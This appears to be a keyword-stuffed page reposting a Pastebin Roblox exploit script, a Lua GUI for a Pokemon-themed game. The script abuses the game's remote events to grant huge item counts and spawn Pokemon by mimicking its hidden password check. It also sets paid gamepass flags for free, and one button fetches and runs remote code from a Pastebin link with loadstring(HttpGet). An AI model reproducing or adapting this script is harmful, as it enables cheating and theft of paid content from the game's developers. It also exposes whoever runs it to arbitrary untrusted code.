roblox exploit scripts
roblox exploit scripts from Pastebin
Roblox exploit scripts pastebin Pastebin Roblox exploit scripts pastebin paste Roblox exploit scripts copy and paste details Roblox exploit scripts discord server code Roblox exploit scripts download
--Origin GUI [Alpha]
-- Made By Zevisu#9228
local ScreenGui = Instance.new("ScreenGui")
local LoginFrame = Instance.new("Frame")
local bar1 = Instance.new("Frame")
local ltitle = Instance.new("TextLabel")
local info = Instance.new("TextLabel")
local login = Instance.new("TextButton")
local MainFrame = Instance.new("Frame")
local mbar1 = Instance.new("Frame")
local mtitle = Instance.new("TextLabel")
local mclose = Instance.new("TextButton")
local credits = Instance.new("TextLabel")
local scrbut = Instance.new("TextButton")
local ScriptFrame = Instance.new("Frame")
local sbar1 = Instance.new("Frame")
local sclose = Instance.new("TextButton")
local speed = Instance.new("TextButton")
local items = Instance.new("TextButton")
local spawner = Instance.new("TextButton")
local gamepass = Instance.new("TextButton")
--Properties:
ScreenGui.Parent = game.CoreGui
LoginFrame.Name = "LoginFrame"
LoginFrame.Parent = ScreenGui
LoginFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
LoginFrame.BorderColor3 = Color3.new(0, 0, 0)
LoginFrame.BorderSizePixel = 3
LoginFrame.Position = UDim2.new(0.0366336703, 0, 0.128721684, 0)
LoginFrame.Size = UDim2.new(0, 275, 0, 242)
bar1.Name = "bar1"
bar1.Parent = LoginFrame
bar1.BackgroundColor3 = Color3.new(0, 0, 0)
bar1.BorderColor3 = Color3.new(0.105882, 0.105882, 0.105882)
bar1.Position = UDim2.new(-0.00256302953, 0, -0.0022534444, 0)
bar1.Size = UDim2.new(0, 275, 0, 25)
ltitle.Name = "ltitle"
ltitle.Parent = bar1
ltitle.BackgroundColor3 = Color3.new(1, 1, 1)
ltitle.BackgroundTransparency = 1
ltitle.Position = UDim2.new(0.131834716, 0, 0.069648236, 0)
ltitle.Size = UDim2.new(0, 200, 0, 23)
ltitle.Font = Enum.Font.GothamBlack
ltitle.Text = "Origin GUI "
ltitle.TextColor3 = Color3.new(1, 1, 1)
ltitle.TextScaled = true
ltitle.TextSize = 14
ltitle.TextWrapped = true
info.Name = "info"
info.Parent = bar1
info.BackgroundColor3 = Color3.new(1, 1, 1)
info.BackgroundTransparency = 1
info.Position = UDim2.new(0.130909085, 0, 2.55999994, 0)
info.Size = UDim2.new(0, 200, 0, 102)
info.Font = Enum.Font.GothamBlack
info.Text = "Origin GUI, this is a gui with a script hub containing project pokemon scripts, and a soon to be executor, enjoy!"
info.TextColor3 = Color3.new(1, 1, 1)
info.TextScaled = true
info.TextSize = 14
info.TextWrapped = true
login.Name = "login"
login.Parent = LoginFrame
login.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
login.BorderColor3 = Color3.new(0, 0, 0)
login.BorderSizePixel = 3
login.Position = UDim2.new(0.352727264, 0, 0.822314024, 0)
login.Size = UDim2.new(0, 79, 0, 34)
login.Font = Enum.Font.GothamBlack
login.Text = "Login"
login.TextColor3 = Color3.new(1, 1, 1)
login.TextScaled = true
login.TextSize = 14
login.TextWrapped = true
login.MouseButton1Down:connect(function()
LoginFrame.Visible = false
MainFrame.Visible = true
end)
MainFrame.Name = "MainFrame"
MainFrame.Parent = ScreenGui
MainFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
MainFrame.BorderColor3 = Color3.new(0, 0, 0)
MainFrame.BorderSizePixel = 3
MainFrame.Position = UDim2.new(0.0277227759, 0, 0.430062622, 0)
MainFrame.Size = UDim2.new(0, 321, 0, 264)
MainFrame.Visible = false
mbar1.Name = "mbar1"
mbar1.Parent = MainFrame
mbar1.BackgroundColor3 = Color3.new(0, 0, 0)
mbar1.BorderColor3 = Color3.new(0.105882, 0.105882, 0.105882)
mbar1.Position = UDim2.new(-0.00256309635, 0, -0.0022534458, 0)
mbar1.Size = UDim2.new(0, 321, 0, 25)
mtitle.Name = "mtitle"
mtitle.Parent = mbar1
mtitle.BackgroundColor3 = Color3.new(1, 1, 1)
mtitle.BackgroundTransparency = 1
mtitle.Position = UDim2.new(0.185566559, 0, 0.171199888, 0)
mtitle.Size = UDim2.new(0, 200, 0, 14)
mtitle.Font = Enum.Font.GothamBlack
mtitle.Text = "Origin GUI"
mtitle.TextColor3 = Color3.new(1, 1, 1)
mtitle.TextSize = 20
mtitle.TextWrapped = true
mclose.Name = "mclose"
mclose.Parent = MainFrame
mclose.BackgroundColor3 = Color3.new(1, 1, 1)
mclose.BackgroundTransparency = 1
mclose.Position = UDim2.new(0.919003129, 0, -0.0113636255, 0)
mclose.Size = UDim2.new(0, 26, 0, 29)
mclose.Font = Enum.Font.GothamBlack
mclose.Text = "X"
mclose.TextColor3 = Color3.new(1, 1, 1)
mclose.TextScaled = true
mclose.TextSize = 14
mclose.TextWrapped = true
mclose.MouseButton1Down:connect(function()
MainFrame:Destroy()
end)
credits.Name = "credits"
credits.Parent = MainFrame
credits.BackgroundColor3 = Color3.new(1, 1, 1)
credits.BackgroundTransparency = 1
credits.Position = UDim2.new(0.0280373823, 0, 0.919157922, 0)
credits.Size = UDim2.new(0, 143, 0, 21)
credits.Font = Enum.Font.GothamBlack
credits.Text = "GUI Made By Zevisu #9228"
credits.TextColor3 = Color3.new(1, 1, 1)
credits.TextScaled = true
credits.TextSize = 14
credits.TextWrapped = true
scrbut.Name = "scrbut"
scrbut.Parent = MainFrame
scrbut.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
scrbut.BorderColor3 = Color3.new(0, 0, 0)
scrbut.BorderSizePixel = 3
scrbut.Position = UDim2.new(0.517133951, 0, 0.693181813, 0)
scrbut.Size = UDim2.new(0, 129, 0, 50)
scrbut.Font = Enum.Font.GothamBlack
scrbut.Text = "Scripts"
scrbut.TextColor3 = Color3.new(1, 1, 1)
scrbut.TextSize = 30
scrbut.TextWrapped = true
scrbut.MouseButton1Down:connect(function()
MainFrame.Visible = false
ScriptFrame.Visible = true
end)
ScriptFrame.Name = "ScriptFrame"
ScriptFrame.Parent = ScreenGui
ScriptFrame.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ScriptFrame.BorderColor3 = Color3.new(0, 0, 0)
ScriptFrame.BorderSizePixel = 3
ScriptFrame.Position = UDim2.new(0.600990117, 0, 0.127348647, 0)
ScriptFrame.Size = UDim2.new(0, 294, 0, 269)
ScriptFrame.Visible = false
sbar1.Name = "sbar1"
sbar1.Parent = ScriptFrame
sbar1.BackgroundColor3 = Color3.new(0, 0, 0)
sbar1.BorderColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
sbar1.BorderSizePixel = 3
sbar1.Size = UDim2.new(0, 294, 0, 24)
sclose.Name = "sclose"
sclose.Parent = sbar1
sclose.BackgroundColor3 = Color3.new(1, 1, 1)
sclose.BackgroundTransparency = 1
sclose.Position = UDim2.new(0.911564648, 0, 0, 0)
sclose.Size = UDim2.new(0, 32, 0, 24)
sclose.Font = Enum.Font.GothamBlack
sclose.Text = "X"
sclose.TextColor3 = Color3.new(1, 1, 1)
sclose.TextScaled = true
sclose.TextSize = 14
sclose.TextWrapped = true
sclose.MouseButton1Down:connect(function()
ScriptFrame:Destroy()
end)
speed.Name = "speed"
speed.Parent = ScriptFrame
speed.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
speed.BorderColor3 = Color3.new(0, 0, 0)
speed.BorderSizePixel = 3
speed.Position = UDim2.new(0.183673471, 0, 0.148698881, 0)
speed.Size = UDim2.new(0, 200, 0, 45)
speed.Font = Enum.Font.GothamBlack
speed.Text = "Faster Walkspeed"
speed.TextColor3 = Color3.new(1, 1, 1)
speed.TextScaled = true
speed.TextSize = 14
speed.TextWrapped = true
speed.MouseButton1Down:connect(function()
game.Workspace.Zevisu.Humanoid.WalkSpeed = 100
end)
items.Name = "items"
items.Parent = ScriptFrame
items.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
items.BorderColor3 = Color3.new(0, 0, 0)
items.BorderSizePixel = 3
items.Position = UDim2.new(0.183673471, 0, 0.352983624, 0)
items.Size = UDim2.new(0, 200, 0, 45)
items.Font = Enum.Font.GothamBlack
items.Text = "Alot Of Every Item"
items.TextColor3 = Color3.new(1, 1, 1)
items.TextScaled = true
items.TextSize = 14
items.TextWrapped = true
items.MouseButton1Down:connect(function()
Amount = 99999
b=game.Players.LocalPlayer.Bag
r=game.ReplicatedStorage.REvents
Items = {
Recover = {"Antidote","Awakening","Burn Heal","Full Restore","Hyper Potion","Ice Heal","Max Elixir","Potion","Paralyze Heal","Revive"},
Pokeball = {"Great Ball","Nest Ball","Net Ball","Pokeball","Premier Ball","Repeat Ball","Ultra Ball","Master Ball"},
Evolution = {"Rare Candy","Common Candy","Dragon Scale","Fire Stone","Friendship Ribbon","Leaf Stone","Link Cable Stone","Metal Coat","Moon Stone","Sinnoh Stone","Thunder Stone","Water Stone"},
Competitive = {"Calcium","Carbos","HP Up","Iron","Mini Stat Reset","Nature Stone","PokeImprove","Protein","Stat Reset","Zinc"}
}
for n,t in next,Items do
for _,i in next,t do
if b[n]:FindFirstChild(i)then
r.Internal.funcItem:InvokeServer(b[n][i],Amount)
else r.Pokemon.ozAxZ:InvokeServer(i,b[n],Amount)
end end end
end)
spawner.Name = "spawner"
spawner.Parent = ScriptFrame
spawner.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
spawner.BorderColor3 = Color3.new(0, 0, 0)
spawner.BorderSizePixel = 3
spawner.Position = UDim2.new(0.183673471, 0, 0.567315042, 0)
spawner.Size = UDim2.new(0, 200, 0, 45)
spawner.Font = Enum.Font.GothamBlack
spawner.Text = "Pokemon Spawner :D"
spawner.TextColor3 = Color3.new(1, 1, 1)
spawner.TextScaled = true
spawner.TextSize = 14
spawner.TextWrapped = true
spawner.MouseButton1Down:connect(function()
_G.PlayingCheckers = function(pokemon, party, level, leavethistrueiguess)
local Encrypt = function(CodeSource)
local StringCode = '';
for i = 1, #CodeSource do
StringCode = StringCode ..string.char(48)..string.byte(string.sub(CodeSource,i,i));
end
return StringCode;
end
local pass = Encrypt(game.Players.LocalPlayer.Name..level..pokemon)
game.ReplicatedStorage.REvents.Pokemon.iwillknowXD:InvokeServer(pokemon, party, level, leavethistrueiguess, leavethistrueiguess, pass)
end
wait(.4)
loadstring(game:HttpGet("https://pastebin.com/raw/8qrgSuaU", true))()
end)
gamepass.Name = "gamepass"
gamepass.Parent = ScriptFrame
gamepass.BackgroundColor3 = Color3.new(0.0784314, 0.0784314, 0.0784314)
gamepass.BorderColor3 = Color3.new(0, 0, 0)
gamepass.BorderSizePixel = 3
gamepass.Position = UDim2.new(0.183673471, 0, 0.758204103, 0)
gamepass.Size = UDim2.new(0, 200, 0, 45)
gamepass.Font = Enum.Font.GothamBlack
gamepass.Text = "Every Gamepass"
gamepass.TextColor3 = Color3.new(1, 1, 1)
gamepass.TextScaled = true
gamepass.TextSize = 14
gamepass.TextWrapped = true
gamepass.MouseButton1Down:connect(function()
local plr = game.Players.LocalPlayer
plr.MewVIP.Value = 1
plr.OtherLegendary.Value = 1
plr.EeveeVIP.Value = 1
plr.RunVIP.Value = 1
plr.JohtoVIP.Value = 1
plr.KantoStarterVIP.Value = 1
plr.LegendaryVIP.Value = 1
plr.ShinyVIP.Value = 1
plr.MoonVIP.Value = 1
plr.MoreneyVIP.Value = 1
end)